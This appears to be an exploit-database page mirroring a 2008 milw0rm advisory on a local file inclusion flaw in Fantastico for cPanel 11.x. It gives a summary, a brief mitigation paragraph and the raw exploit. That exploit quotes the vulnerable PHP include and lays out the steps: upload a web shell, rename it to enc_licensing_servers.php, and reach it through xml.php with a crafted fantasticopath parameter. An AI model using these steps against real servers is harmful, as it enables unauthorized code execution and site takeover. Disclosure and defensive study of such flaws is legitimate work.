header-logo
Suggest Exploit
vendor:
Cpanel 11.x
by:
joker_1
7.5
CVSS
HIGH
Local File Include
98
CWE
Product Name: Cpanel 11.x
Affected Version From: Cpanel 11.x
Affected Version To: Cpanel 11.x
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Fantastico In all Version Cpanel 11.x <= local File Include

A vulnerability exists in Fantastico in all versions of Cpanel 11.x, which allows an attacker to include a local file. To exploit this vulnerability, an attacker must first login to port 2082 and disable mod_security, safe_mode, and all disable functions. The vulnerable code is located in http://xx.com:2082/frontend/x/fantastico/includes/xml.php, which includes a file called enc_licensing_servers.php. An attacker can exploit this vulnerability by creating a directory called /includes/ and uploading a shell.php file, which is then renamed to enc_licensing_servers.php. The exploit can then be accessed via http://xxx.com:2082/frontend/x/fantastico/includes/xml.php?fantasticopath=/home/user.

Mitigation:

To mitigate this vulnerability, ensure that mod_security, safe_mode, and all disable functions are enabled. Additionally, ensure that all files are properly validated and that all user input is sanitized.
Source

Exploit-DB raw data:

##############################################################
Fantastico In all Version Cpanel 11.x <= local File Include

##############################################################


Must login to  :2082
To break the protection   mod_security  & safe_mode: off  & Disable functions :  all none

 

Vulnerable Code

$licensing_servers=$fantasticopath . "/includes/enc_licensing_servers.php";
if (is_file($licensing_servers))
       {
       include($licensing_servers);


in

http://xx.com:2082/frontend/x/fantastico/includes/xml.php


Exploit >>

First Create directory Let the name  /includes/ and upload Shell.php  in  /includes/  Then  rename it to enc_licensing_servers.php


:::xploit::::

http://xxx.com:2082/frontend/x/fantastico/includes/xml.php?fantasticopath=/home/user

 

###################################################

Discoverd By : joker_1

 

for info : pl57@msn.com

 

###################################################

Special Greetings :- sniper-sa.com & Group XP & Alm3reFh.Com & Genral kbkb & step on the snow & red trigger & qalbhamad & saudi star

###################################################

# milw0rm.com [2008-09-14]